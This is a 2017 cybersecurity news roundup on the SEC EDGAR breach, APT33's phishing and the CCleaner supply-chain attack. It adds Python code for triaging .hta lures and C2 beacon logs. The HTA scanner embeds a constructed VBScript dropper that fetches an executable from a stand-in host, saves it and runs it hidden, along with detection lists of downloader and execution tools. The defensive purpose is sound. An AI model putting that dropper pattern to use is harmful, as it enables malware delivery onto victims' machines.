September 22, 2017
UNM4SK3D: SEC, APT33, and CCleaner
#hacked

It seems that word of a new breach has been released almost daily as of late. The latest, coming on the heels of the devastating Equifax breach, is news that the Securities and Exchange Commission (SEC) was hacked last year. Gulp.

The SEC is the top U.S. markets regulator. Its official website states, "The mission of the U.S. Securities and Exchange Commission is to protect investors, maintain fair, orderly, and efficient markets, and facilitate capital formation." With news of this breach, that mission looks to have failed: hackers were able to gain access to the financial document filing system and may have illegally profited from the stolen information. News reports indicate that no personal data was compromised, but the incident heightens the alarm over inadequate security in large, critical organizations. In the months after the 2016 breach was detected, "the Government Accountability Office found that the SEC did not always use encryption, used unsupported software, and failed to implement well-tuned firewalls and other key security features while going about its business," Reuters reported.

The SEC says it learned last month that a "previously detected 2016 cyber attack, which exploited a 'software vulnerability' in the online EDGAR public-company filing system, may have provided the basis for illicit gain through trading." To clarify, EDGAR ('Electronic Data Gathering, Analysis, and Retrieval') is the online filing system through which companies submit their financial filings. EDGAR processes around 1.7 million electronic filings a year. Within the database are corporate disclosures ranging from "quarterly earnings to sensitive and confidential information on mergers and acquisitions, which could be used for insider-trading or manipulating U.S. equity markets." The SEC says the flaw was promptly patched once discovered, but that was after the intrusion had already taken place.
In a statement, the SEC said it is still investigating the incident, cooperating with law enforcement, and tracking individuals it believes placed false filings on the EDGAR system. Meanwhile, Equifax has just disclosed that it suffered another breach, dating to March 2017, although the details are still unclear.
Notwithstanding our efforts to protect our systems and manage cybersecurity risk, in certain cases cyber threat actors have managed to access or misuse our systems. We believe the intrusion did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk. -SEC Chairman Jay Clayton

Regardless of the size of your organization, there are valuable lessons to be learned. Read 'Best Tools for Business Owners' for insight.
#cyberespionage

One small victory in the cyber world: researchers at FireEye have uncovered a cyber espionage group, 'Advanced Persistent Threat 33' (APT33), which targets aerospace, defense and energy companies in the United States, Saudi Arabia and South Korea.

According to the latest report, APT33's 'DropShot' attack tool is connected to the infamous 'StoneDrill' wiper malware. The malware is delivered through spear phishing campaigns that use advertisements for jobs at Saudi Arabian aviation companies and Western organizations as lures, researchers said. 'StoneDrill' was initially identified by Kaspersky Lab, which had seen it target a European petroleum company, and is believed to be an updated version of the 'Shamoon 2' malware. Reports indicate APT33 has been active since 2013, but neither research group knows whether the hackers behind 'Shamoon' and 'StoneDrill' are the same group or simply share interests and target the same regions.

The apparent goal of the attacks is to advance Iran's own aviation capabilities, gather Saudi-related military intelligence for Iran, and help Iranian petrochemical firms gain a competitive advantage over Saudi Arabian companies. Consistent with this, evidence indicates the group may be tied to the Iranian government. The links in the phishing emails used spoofed domains impersonating Boeing, Alsalam Aircraft Company, and Northrop Grumman Aviation Arabia.
The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individual. Unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor (TurnedUp). -FireEye Researchers

The energy sector has been a major target for a variety of espionage groups. Learn more in this recent edition of 'UNM4SK3D.'
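The FireEye quote above describes the lure pattern, a visible job posting with a hidden downloader, without publishing the script itself. The following is an added example (not FireEye's code or indicators, and not APT33 tooling) of how a defender can statically triage an .hta attachment: it extracts the <script> blocks, checks them for the primitives a dropper needs (fetch, stage to disk, execute, hide the window), and separates the URLs the script reaches for from the links the page shows the user. The indicator strings are generic HTA/VBScript/JScript dropper primitives chosen as assumptions for illustration, and both HTA documents are constructed.

```python
"""
Static triage of an .hta lure for an embedded downloader.

Added example, not FireEye's code or published indicators. It pulls the
<script> blocks out of an HTA and flags script that combines a network
fetch with execution, reporting any URLs the script reaches for. The
indicator strings are common HTA/VBScript/JScript dropper primitives chosen
for illustration (assumptions, not APT33 indicators); the sample HTA
documents are constructed.
"""
import re

# Constructed lure: a job-posting page that also fetches and runs a binary.
SAMPLE_HTA = r"""<html><head><title>Aviation Engineer - Apply Now</title>
<HTA:APPLICATION ID="app" WINDOWSTATE="minimize" SHOWINTASKBAR="no">
<script language="VBScript">
Set sh = CreateObject("WScript.Shell")
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://jobs.example.test/update.exe", False
http.Send
Set ado = CreateObject("ADODB.Stream")
ado.Type = 1: ado.Open: ado.Write http.ResponseBody
ado.SaveToFile "C:\Users\Public\update.exe", 2
sh.Run "C:\Users\Public\update.exe", 0, False
</script></head>
<body><h1>Aviation Engineer</h1>
<p>Full posting: <a href="http://jobs.example.test/">jobs.example.test</a></p>
</body></html>
"""

# Constructed benign HTA for comparison: it has script, but no fetch or exec.
BENIGN_HTA = """<html><script language="JScript">document.title = "Hello";</script>
<body>Hello</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

# Primitive families an HTA needs to fetch, stage and run a payload
# (assumed indicator strings for illustration, matched case-insensitively).
FETCH = ["MSXML2.XMLHTTP", "Microsoft.XMLHTTP", "WinHttp.WinHttpRequest",
         "DownloadFile", "DownloadString", "Invoke-WebRequest", "certutil", "bitsadmin"]
WRITE = ["ADODB.Stream", "SaveToFile", "Scripting.FileSystemObject"]
EXEC = ["WScript.Shell", "Shell.Application", "ShellExecute", ".Run ", ".Exec(",
        "powershell", "cmd.exe", "mshta", "rundll32", "regsvr32"]
HIDE = ['WINDOWSTATE="minimize"', 'SHOWINTASKBAR="no"', "window.close", "self.close"]


def extract_scripts(hta_text):
    """Return the bodies of all <script> blocks in the HTA."""
    return [m.group(1) for m in SCRIPT_RE.finditer(hta_text)]


def _hits(patterns, text):
    low = text.lower()
    return [p for p in patterns if p.lower() in low]


def scan_hta(hta_text):
    """Classify an HTA by the dropper primitives its script uses.

    Returns a dict with a verdict, the matched indicators per family, and the
    URLs referenced from script (as opposed to visible page links), which are
    the candidate payload sources to block and hunt for.
    """
    script = "\n".join(extract_scripts(hta_text))
    hits = {
        "fetch": _hits(FETCH, script),
        "write": _hits(WRITE, script),
        "exec": _hits(EXEC, script),
        "hide": _hits(HIDE, hta_text),  # window tricks sit in the HTA:APPLICATION tag
    }
    script_urls = sorted(set(URL_RE.findall(script)))
    page_urls = sorted(set(URL_RE.findall(hta_text)) - set(script_urls))
    if hits["fetch"] and hits["exec"]:
        verdict = "likely dropper"  # fetches something and runs something
    elif hits["fetch"] or hits["write"] or hits["exec"]:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"verdict": verdict, "hits": hits,
            "payload_urls": script_urls, "page_urls": page_urls}


if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_HTA), ("benign", BENIGN_HTA)):
        r = scan_hta(doc)
        print(f"{name}: {r['verdict']}; payload URLs {r['payload_urls']}; hits {r['hits']}")
```

The split between `payload_urls` and `page_urls` is the useful part for response: the visible link is the legitimate posting the lure copies, while the URL inside script is where the backdoor comes from. String matching of this kind is easy to evade with obfuscation (string concatenation, `Chr()` encoding), so treat a "benign-looking" verdict as "nothing obvious", not as clean.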
#malware

For those affected by the CCleaner malware from earlier in the week who thought they were in the clear, think again. A second-stage payload was aimed at machines inside roughly 20 major international technology companies.

In the initial hack, a group of unknown hackers hijacked CCleaner's download server to distribute a malicious version of the popular system optimization software. Researchers who first investigated the malware, which reached 2.3 million users, assured the public that "there's no second stage malware used in the massive attack and affected users can simply update their version in order to get rid of the malicious software." They were wrong. Analyzing the hackers' command-and-control (C2) server, Cisco's Talos Group found evidence of a second payload (GeeSetup_x86.dll, a lightweight backdoor module) that was delivered only to a specific list of computers, selected by their local domain names. The same server held records of nearly 700,000 backdoored machines that had checked in. The Hacker News reported that "the attack was designed to find computers inside the networks of the major technology firms and deliver the secondary payload." Targeted companies include Google, Microsoft, Samsung, Akamai, and VMware. Researchers have recommended that targeted companies fully restore their systems from backups.
These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from backups or reimage systems to ensure that they completely remove not only the backdoored version of CCleaner but also any other malware that may be resident on the system. -Talos Group researchers

Want more insight on CCleaner? Get this blog from Tripwire for details.
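The point Talos makes above, that the second stage went only to hosts whose local domain matched a target list, is the same logic a responder has to reproduce when deciding which of the hundreds of thousands of beaconing machines need to be handled first. The following is an added example (not Talos or Avast code) that re-creates that selection step over a constructed beacon log: the record format, the target domains and the host names are placeholders invented for illustration; the real target list named domains at large technology firms and was not reproduced here.

```python
"""
C2 beacon triage: which backdoored hosts were selected for the second stage?

Added example, not Talos or Avast code. It re-creates, on constructed data,
the selection step described above: every backdoored CCleaner install
beaconed to the C2, but only hosts whose local domain matched the attackers'
target list were served the second-stage payload. The beacon line format,
the target domains and the host names below are constructed placeholders.
"""
import re
from dataclasses import dataclass

# Constructed stand-ins for the attackers' target domains.
TARGET_DOMAINS = {
    "corp.example-tech.com",
    "dev.example-cloud.net",
    "example-chip.local",
}

# Constructed beacon log in a made-up "<time> host=<fqdn> muid=<id>" format.
SAMPLE_BEACONS = """\
2017-09-15T10:01:22Z host=WS-0412.corp.example-tech.com muid=1a2b3c
2017-09-15T10:01:25Z host=HOME-PC.lan muid=4d5e6f
2017-09-15T10:02:07Z host=BUILD07.DEV.EXAMPLE-CLOUD.NET muid=7a8b9c
2017-09-15T10:02:09Z host=ws-0412.corp.example-tech.com muid=1a2b3c
2017-09-15T10:03:41Z host=ws.corp.example-tech.com.evil.test muid=0d1e2f
2017-09-15T10:04:00Z malformed record without host or muid
"""

BEACON_RE = re.compile(r"host=(?P<host>\S+)\s+muid=(?P<muid>\S+)")


@dataclass(frozen=True)
class Beacon:
    host: str  # normalised to lower case, no trailing dot
    muid: str


def parse_beacons(text):
    """Parse beacon lines, skipping records that lack host and muid."""
    beacons = []
    for line in text.splitlines():
        m = BEACON_RE.search(line)
        if m:
            beacons.append(Beacon(host=m["host"].lower().rstrip("."), muid=m["muid"]))
    return beacons


def in_target_domain(host, targets=TARGET_DOMAINS):
    """True if host is a target domain or lies beneath one.

    Matches on label boundaries rather than as a bare substring, so
    'ws.corp.example-tech.com.evil.test' does not count as corp.example-tech.com.
    """
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in targets)


def triage(text, targets=TARGET_DOMAINS):
    """Split beaconing hosts into (stage2, stage1_only) sets of host names.

    stage2 hosts matched the target list and should be assumed to carry the
    second-stage backdoor: restore from backup or reimage, and hunt for lateral
    movement from them. stage1_only hosts ran the backdoored build but were not
    selected; Talos still advises reimaging them, so this sets priority, not scope.
    """
    stage2, stage1_only = set(), set()
    for b in parse_beacons(text):
        (stage2 if in_target_domain(b.host, targets) else stage1_only).add(b.host)
    return stage2, stage1_only


if __name__ == "__main__":
    s2, s1 = triage(SAMPLE_BEACONS)
    print("second stage (reimage first):", sorted(s2))
    print("stage one only:", sorted(s1))
```

Two details matter in practice. Host names are normalised (case, trailing dot) before comparison, because the same machine can check in under different spellings and must not be counted twice; and the domain check is a suffix match on label boundaries, not a substring match, so a lookalike such as `ws.corp.example-tech.com.evil.test` is not mistaken for an internal host.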